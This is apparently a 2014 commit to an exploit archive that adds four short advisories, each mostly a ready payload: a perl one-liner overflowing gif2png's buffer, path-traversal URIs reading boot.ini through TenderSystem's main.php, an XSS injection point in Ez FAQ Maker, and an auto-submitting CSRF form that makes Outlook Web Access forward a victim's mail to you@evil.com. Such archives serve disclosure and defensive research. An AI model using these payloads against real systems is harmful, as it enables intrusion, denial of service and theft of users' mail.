Updated 08_19_2014

2014-08-19 04:40:31 +00:00 · 2014-08-19 04:40:31 +00:00 · 3500985540
commit 3500985540
parent 7fc5a86ea9
5 changed files with 54 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30940,3 +30940,7 @@ id,file,description,date,author,platform,type,port
 34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
 34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0
+34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0
+34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0
+34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0
+34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0
--- a/platforms/linux/dos/34356.txt
+++ b/platforms/linux/dos/34356.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41801/info
+
+gif2png is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
+
+gif2png 2.5.2 is vulnerable; other versions may also be affected. 
+
+$> ./gif2png $(perl -e 'print "A" x 1053') 
--- a/platforms/php/webapps/34354.txt
+++ b/platforms/php/webapps/34354.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/41792/info
+
+TenderSystem is prone to a multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+TenderSystem 0.9.5 Beta is vulnerable. 
+
+The following example URI's are available:
+
+http://www.example.com/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
+
+http://www.example.com/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html 
--- a/platforms/php/webapps/34357.txt
+++ b/platforms/php/webapps/34357.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41806/info
+
+ScriptsEz Ez FAQ Maker is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
+
+An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
+
+Ez FAQ Maker 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/faq/index.php?action=showcat&cid=8&sid="[XSS] 
--- a/platforms/windows/dos/34359.html
+++ b/platforms/windows/dos/34359.html
@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/41843/info
+
+Microsoft Outlook Web Access for Exchange Server 2003 is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
+
+<form name="xsrf" action="http://www.example.com/Exchange/victim_id" method="post" target="_self">
+<input type="hidden" name="cmd" value="saverule">
+<input type="hidden" name="rulename" value="evilrule">
+<input type="hidden" name="ruleaction" value="3">
+<input type="hidden" name="forwardtocount" value="1">
+<input type="hidden" name="forwardtoname" value="guy, bad">
+<input type="hidden" name="forwardtoemail" value="you@evil.com">
+<input type="hidden" name="forwardtotype" value="SMTP">
+<input type="hidden" name="forwardtoentryid" value="">
+<input type="hidden" name="forwardtosearchkey" value="">
+<input type="hidden" name="forwardtoisdl" value="">
+<input type="hidden" name="keepcopy" value="1">
+<body onload="document.forms.xsrf.submit();">